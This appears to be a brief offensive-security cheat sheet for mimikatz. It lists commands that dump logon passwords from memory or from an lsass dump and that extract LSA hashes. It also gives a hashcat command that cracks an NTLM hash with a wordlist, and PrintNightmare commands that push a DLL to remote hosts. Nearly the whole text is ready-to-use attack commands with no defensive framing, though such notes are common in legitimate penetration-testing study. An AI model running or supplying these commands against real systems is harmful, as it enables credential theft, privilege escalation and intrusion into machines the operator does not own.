# mimikatz

download mimikatz from github: https://github.com/gentilkiwi/mimikatz/

# logon passwords

mimikatz.exe               # run as administrator
log mimi.txt               # save output to a log file
privilege::debug           # should respond with Privilege '20' OK or it won't work
sekurlsa::logonpasswords

from a dump file

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full

# Dump hashes

mimikatz.exe
privilege::debug
lsadump::lsa /patch    # dump hashes
                       # crack hashes on local machine
hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt -O  

# print nightmare

mimikatz # misc::printnightmare /server:192.168.8.108 /library:z:\mimispool.dll
misc::printnightmare /server:127.0.0.1 /library:z:\mimispool.dll
misc::printnightmare /server:192.168.8.200 /library:z:\powah.dll /try:50